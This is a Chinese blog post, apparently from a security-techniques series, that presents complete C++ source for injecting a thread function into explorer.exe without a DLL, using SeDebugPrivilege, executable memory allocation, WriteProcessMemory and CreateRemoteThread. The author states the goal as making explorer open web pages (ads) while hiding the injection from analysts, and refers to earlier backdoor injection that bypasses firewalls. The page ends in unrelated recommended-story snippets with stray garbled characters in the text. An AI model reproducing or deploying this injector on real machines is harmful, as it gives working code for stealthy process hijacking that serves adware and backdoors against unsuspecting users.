安全之路 —— 無DLL文件實(shí)現(xiàn)遠(yuǎn)程線程注入

簡介

????????在之前的章節(jié)中,筆者曾介紹過有關(guān)于遠(yuǎn)程線程注入的知識(shí)篱瞎,將后門.dll文件注入explorer.exe中實(shí)現(xiàn)繞過防火墻反彈后門。但一個(gè).exe文件總要在注入時(shí)捎上一個(gè).dll文件著實(shí)是怪麻煩的痒芝,那么有沒有什么方法能夠不適用.dll文件實(shí)現(xiàn)注入呢俐筋?
????????答案是有的,我們可以直接將功能寫在線程函數(shù)中严衬,然后直接將整個(gè)函數(shù)注入澄者,這個(gè)方法相較之于DLL注入會(huì)稍微復(fù)雜一些,適用于對一些體積比較小的程序進(jìn)行注入。但是要注意動(dòng)態(tài)鏈接庫的地址重定位問題粱挡,因?yàn)檎5奈募话銜?huì)默認(rèn)載入kernel32.dll文件赠幕,而不會(huì)載入其他DLL,且只有kernel32.dll與user32.dll文件可以保證在本地和目的進(jìn)程中的加載地址是一樣的询筏,所以最好要在遠(yuǎn)程線程函數(shù)中手動(dòng)利用LoadLibrary和GetProcessAddress函數(shù)強(qiáng)制加載一遍DLL文件榕堰。Visual Studio在編譯此類功能的文件時(shí)建議關(guān)閉編譯器的“/GS”選項(xiàng),還要其他需要注意的地方可參考此鏈接嫌套。
????????下面我們借助此方法實(shí)現(xiàn)讓W(xué)indows資源管理器explorer.exe實(shí)現(xiàn)彈網(wǎng)頁(發(fā)廣告)的功能逆屡,而分析人員卻無法從程序依賴的動(dòng)態(tài)鏈接庫中找到我們注入線程用的DLL文件,達(dá)到了一定的隱藏效果踱讨。

代碼實(shí)現(xiàn)


//////////////////////////////
//
// FileName : InjectProcess.cpp
// Creator : PeterZheng
// Date : 2018/8/18 0:35
// Comment : Inject Process Without Dll File
//
//////////////////////////////

#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <string>
#include <string.h>
#include <windows.h>
#include <strsafe.h>
#include <tlhelp32.h>

#define MAX_LENGTH 50
#define NORMAL_LENGTH 20
#pragma warning(disable:4996)

using namespace std;

//遠(yuǎn)程線程函數(shù)參數(shù)
typedef struct _RemoteParam
{
    CHAR szOperation[NORMAL_LENGTH];
    CHAR szAddrerss[MAX_LENGTH];
    CHAR szLb[NORMAL_LENGTH];
    CHAR szFunc[NORMAL_LENGTH];
    LPVOID lpvMLAAdress;
    LPVOID lpvMGPAAddress;
    LPVOID lpvSEAddress;
}RemoteParam;

//遠(yuǎn)程線程函數(shù)(主體)
DWORD WINAPI ThreadProc(RemoteParam *lprp)
{
    typedef HMODULE(WINAPI *MLoadLibraryA)(IN LPCTSTR lpFileName);
    typedef FARPROC(WINAPI *MGetProcAddress)(IN HMODULE hModule, IN LPCSTR lpProcName);
    typedef HINSTANCE(WINAPI *MShellExecuteA)(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
    MLoadLibraryA MLA;
    MGetProcAddress MGPA;
    MShellExecuteA MSE;
    MLA = (MLoadLibraryA)lprp->lpvMLAAdress;
    MGPA = (MGetProcAddress)lprp->lpvMGPAAddress;
    lprp->lpvSEAddress = (LPVOID)MGPA(MLA(lprp->szLb), lprp->szFunc);
    MSE = (MShellExecuteA)lprp->lpvSEAddress;
    MSE(NULL, lprp->szOperation, lprp->szAddrerss, NULL, NULL, SW_SHOWNORMAL);
    return 0;
}

//獲取PID
DWORD GetProcessID(CHAR *ProcessName)
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("CreateToolhelp32Snapshot error");
        return 0;
    }
    BOOL bProcess = Process32First(hProcessSnap, &pe32);
    while (bProcess)
    {
        if (strcmp(strupr(pe32.szExeFile), strupr(ProcessName)) == 0)
            return pe32.th32ProcessID;
        bProcess = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);
    return 0;
}

//獲取權(quán)限
int EnableDebugPriv(const TCHAR *name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    if (!OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
        &hToken))
    {
        printf("OpenProcessToken Error!\n");
        return 1;
    }
    if (!LookupPrivilegeValue(NULL, name, &luid))
    {
        printf("LookupPrivilege Error!\n");
        return 1;
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    if (!AdjustTokenPrivileges(hToken, 0, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
    {
        printf("AdjustTokenPrivileges Error!\n");
        return 1;
    }
    return 0;
}

//遠(yuǎn)程線程注入函數(shù)
BOOL InjectProcess(const DWORD dwPid)
{
    if (EnableDebugPriv(SE_DEBUG_NAME)) return FALSE;
    HANDLE hWnd = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (!hWnd) return FALSE;
    RemoteParam rp;
    ZeroMemory(&rp, sizeof(RemoteParam));
    rp.lpvMLAAdress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "LoadLibraryA");
    rp.lpvMGPAAddress = (LPVOID)GetProcAddress(LoadLibrary("Kernel32.dll"), "GetProcAddress");
    StringCchCopy(rp.szLb, sizeof(rp.szLb), "Shell32.dll");
    StringCchCopy(rp.szFunc, sizeof(rp.szFunc), "ShellExecuteA");
    StringCchCopy(rp.szAddrerss, sizeof(rp.szAddrerss), "https://www.baidu.com");
    StringCchCopy(rp.szOperation, sizeof(rp.szOperation), "open");
    RemoteParam *pRemoteParam = (RemoteParam *)VirtualAllocEx(hWnd, 0, sizeof(RemoteParam), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteParam) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteParam, &rp, sizeof(RemoteParam), 0)) return FALSE;
    LPVOID pRemoteThread = VirtualAllocEx(hWnd, 0, 1024 * 4, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteThread) return FALSE;
    if (!WriteProcessMemory(hWnd, pRemoteThread, &ThreadProc, 1024 * 4, 0)) return FALSE;
    HANDLE hThread = CreateRemoteThread(hWnd, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, (LPVOID)pRemoteParam, 0, NULL);
    if (!hThread) return FALSE;
    return TRUE;
}

//主函數(shù)
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    CHAR szProcName[MAX_LENGTH] = "\0";
    StringCchCopy(szProcName, MAX_LENGTH, "explorer.exe");
    InjectProcess(GetProcessID(szProcName));
    ExitProcess(0);
    return 0;
}
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末魏蔗,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子痹筛,更是在濱河造成了極大的恐慌莺治,老刑警劉巖,帶你破解...
    沈念sama閱讀 212,080評(píng)論 6 493
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件帚稠,死亡現(xiàn)場離奇詭異谣旁,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)滋早,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,422評(píng)論 3 385
  • 文/潘曉璐 我一進(jìn)店門蔓挖,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人馆衔,你說我怎么就攤上這事瘟判。” “怎么了角溃?”我有些...
    開封第一講書人閱讀 157,630評(píng)論 0 348
  • 文/不壞的土叔 我叫張陵拷获,是天一觀的道長。 經(jīng)常有香客問我减细,道長匆瓜,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,554評(píng)論 1 284
  • 正文 為了忘掉前任未蝌,我火速辦了婚禮驮吱,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘萧吠。我一直安慰自己左冬,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,662評(píng)論 6 386
  • 文/花漫 我一把揭開白布纸型。 她就那樣靜靜地躺著拇砰,像睡著了一般梅忌。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上除破,一...
    開封第一講書人閱讀 49,856評(píng)論 1 290
  • 那天牧氮,我揣著相機(jī)與錄音,去河邊找鬼瑰枫。 笑死踱葛,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的光坝。 我是一名探鬼主播剖毯,決...
    沈念sama閱讀 39,014評(píng)論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼教馆!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起擂达,我...
    開封第一講書人閱讀 37,752評(píng)論 0 268
  • 序言:老撾萬榮一對情侶失蹤土铺,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后板鬓,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體悲敷,經(jīng)...
    沈念sama閱讀 44,212評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,541評(píng)論 2 327
  • 正文 我和宋清朗相戀三年俭令,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了后德。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,687評(píng)論 1 341
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡抄腔,死狀恐怖瓢湃,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情赫蛇,我是刑警寧澤绵患,帶...
    沈念sama閱讀 34,347評(píng)論 4 331
  • 正文 年R本政府宣布,位于F島的核電站悟耘,受9級(jí)特大地震影響落蝙,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜暂幼,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,973評(píng)論 3 315
  • 文/蒙蒙 一筏勒、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧旺嬉,春花似錦管行、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,777評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽揽咕。三九已至,卻和暖如春套菜,著一層夾襖步出監(jiān)牢的瞬間亲善,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,006評(píng)論 1 266
  • 我被黑心中介騙來泰國打工逗柴, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留蛹头,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,406評(píng)論 2 360
  • 正文 我出身青樓戏溺,卻偏偏與公主長得像渣蜗,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子旷祸,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,576評(píng)論 2 349

推薦閱讀更多精彩內(nèi)容